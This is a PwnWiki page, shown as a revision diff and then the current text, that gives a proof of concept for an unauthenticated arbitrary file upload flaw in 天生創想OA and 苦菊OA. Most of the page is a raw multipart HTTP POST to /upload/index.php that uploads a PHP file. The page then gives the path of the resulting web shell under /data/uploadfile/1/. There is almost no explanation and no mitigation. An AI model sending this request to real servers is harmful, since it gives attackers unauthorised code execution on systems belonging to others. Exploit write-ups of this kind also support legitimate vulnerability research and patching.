Difference between revisions of "天生創想OA&苦菊OA未授權任意文件上傳漏洞"

From PwnWiki
(Created page with "<languages /> ==POC== <pre> POST /upload/index.php?userid=1 HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86...")
 
(Marked this version for translation)
 
Line 29: Line 29:
  
 
<translate>
 
<translate>
==Shell地址==
+
==Shell地址== <!--T:1-->
 
</translate>
 
</translate>
 
http://<target>/data//uploadfile//1//shell.php
 
http://<target>/data//uploadfile//1//shell.php

Latest revision as of 14:07, 13 July 2021

Other languages:
Chinese • ‎中文(中国大陆)‎

POC

POST /upload/index.php?userid=1 HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript,*/*; q=0.01
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer:http://www.xxx.com/admin.php?ac=document&fileurl=knowledge&type=1&menuid=24
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;boundary=---------------------------115858488212690034922831875554
Content-Length: 256
Origin: http://www.xxx.com
Connection: close
 
-----------------------------115858488212690034922831875554
Content-Disposition: form-data;name="files[]"; filename="1.php"
Content-Type: text/plain
 
<?php
echo 123;
phpinfo();
?>
 
-----------------------------115858488212690034922831875554—

Shell地址

http://<target>/data//uploadfile//1//shell.php

Retrieved from "https://pwnwiki.com/index.php?title=天生創想OA%26苦菊OA未授權任意文件上傳漏洞&oldid=7106"